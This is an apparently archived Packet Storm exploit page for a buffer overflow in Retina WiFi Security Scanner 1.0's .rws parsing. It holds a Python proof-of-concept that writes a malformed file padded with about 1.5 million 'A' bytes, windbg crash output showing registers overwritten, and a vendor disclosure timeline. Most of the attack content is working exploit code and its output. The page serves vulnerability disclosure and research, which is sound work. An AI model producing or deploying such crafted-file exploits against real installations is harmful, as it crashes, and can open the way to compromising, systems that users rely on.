what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Retina WiFi Security Scanner 1.0 Overflow

Retina WiFi Security Scanner 1.0 Overflow
Posted Jul 10, 2009
Authored by LiquidWorm | Site zeroscience.mk

Retina WiFi Security Scanner version 1.0 suffers from a buffer overflow vulnerability when parsing .rws files.

tags | exploit, overflow
SHA-256 | 87580c7c563a3c72ae1c4ebd4faaf927049dc9897bdd011d8c399428b2f6e752

Retina WiFi Security Scanner 1.0 Overflow

Change Mirror Download
#!/usr/bin/python
#
#
# * Title: Retina WiFi Security Scanner 1.0 (.rws parsing) Buffer Overflow Vulnerability
#
#
# * Summary: Retina WiFi Scanner is a tool to be used to detect IEEE 802.11 (WiFi) based devices.
# * Vendor: eEye Digital Security Inc.
# * Product Web Page: http://www.eeye.com/
# * Current Version: 1.0.8.68
# * Notiz: The tool is implemented as part of the eEye's Retina Network Security Scanner package.
# * Tested On Microsoft Windows XP Professional SP3 (English)
#
# * Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
# * liquidworm gmail com
# * http://www.zeroscience.org
# * 16.05.2009
#
# * Original Advisory: http://www.zeroscience.org/codes/retinawifi_bof.txt
#
#
# * --------------------------------windbg---------------------------------- *
#
# (1268.dd8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000003 ecx=000006d8 edx=00000000 esi=0000006c edi=10264da0
# eip=1001dcce esp=0012e72c ebp=0012e754 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# *** Defaulted to export symbols for [path]\WiFiCore.dll -
# WiFiCore!LibWifi_ReportHTML+0x1b48e:
# 1001dcce f644300401 test byte ptr [eax+esi+4],1 ds:0023:414141b1=??
# 0:000> g
# (1268.dd8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000010 ebx=41414141 ecx=00000000 edx=41414141 esi=00001000 edi=41414150
# eip=7c809eda esp=00121484 ebp=001214b0 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# *** Defaulted to export symbols for [path]\kernel32.dll -
# kernel32!IsBadReadPtr+0x39:
# 7c809eda 8a02 mov al,byte ptr [edx] ds:0023:41414141=??
#
# * -------------------------------/windbg---------------------------------- *
#
#
# * Disclosure Timeline:
#
# * [16.05.2009] Vulnerability discovered.
# * [16.05.2009] Initial contact with the vendor with description included + screenshot + proof
# of concept code.
# * [18.05.2009] Vendor contacted again for confirmation of the vulnerability because of no reply
# from previous e-mail.
# * [18.05.2009] Vendor replied and acknowledged the vulnerability. Patch development process in
# progress.
# * [25.05.2009] Vendor contacted for information on patch development and its release process
# because of our advisory disclosure policy.
# * [29.05.2009] Vendor contacted again for information on patch development because of no reply
# from previous e-mail.
# * [29.05.2009] Vendor answered. Bug fixes scheduled within next week.
# * [08.06.2009] Vendor contacted for an accurate date of a patch release or scheduled bug fix
# time line information.
# * [08.06.2009] Vendor replied and confirmed that the vulnerability has been mitigated and passed
# the QA. The fix will be introduced in the next release of the product. Scheduled
# date for the release of the update is not yet known...or...it's unknown :).
# * [12.06.2009] Vendor informs that the fix will be released along with the new scheduled release
# of the Retina package approximately on 29th of June.
# * [29.06.2009] Contacted the vendor, asked for a more accurate (fixed) date of the release.
# * [29.06.2009] Vendor says that the patch is being tested by the QA team along with other program
# * fixes. Vendor will contact me after the tests, with the results from the same.
# * [06.07.2009] Sent an e-mail to the vendor stating that the advisory is planned to be published
# * on 10th of july because of internal company reasons.
# * [09.07.2009] No reply from the vendor.
# * [10.07.2009] Public advisory released.
#
#
#
# * Pozdrav Do:
#
# * sm, thricer, drowsy, Jayji, Leon Juranic,
# * teppei, n3tpr0b3, DrunkY, apo, Aodrulez,
# * kokanin, e.wiZz!, j0rgan, str0ke, Uploader,
# * Jonathan Salwan, Sergio 'shadown' Alvarez,
# * Malformation, dz0, d3, Greg Linares, lio,
# * mio, drown, dni, Damjan, Maximiliano Soler,
# * leetgeek, Preddy, Gliser, eSDee i t.d. :)
#
#
# * Proof Of Concept:
#


#=========================================*snip*=========================================#


header = (
"\x52\x57\x53"
"\x30\x31\x30"
"\x19\x52\x76"
"\x00"
)

buffer = "\x41" * 1574624 #[Bytes/chars]
#1574622 No issues
#1574623 BoF, Access violation when reading [random]
#1574624 BoF, Access violation when reading [414141B1]
#...

payload = header + buffer

file = "Abulia.rws"

filetzio=open(file,'w')
filetzio.write(payload)
filetzio.close()

print "\n[+] File " + file + " successfully landed.\n"


#=========================================*snip*=========================================#




#################################################################################
# #
# * Disclaimer: #
# #
# * This document and all the information it contains are provided "as is", #
# * for educational purposes only, without warranty of any kind, whether #
# * express or implied. #
# #
# * The author reserves the right not to be responsible for the topicality, #
# * correctness, completeness or quality of the information provided in #
# * this document. Liability claims regarding damage caused by the use of #
# * any information provided, including any kind of information which is #
# * incomplete or incorrect, will therefore be rejected. #
# #
#################################################################################

Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close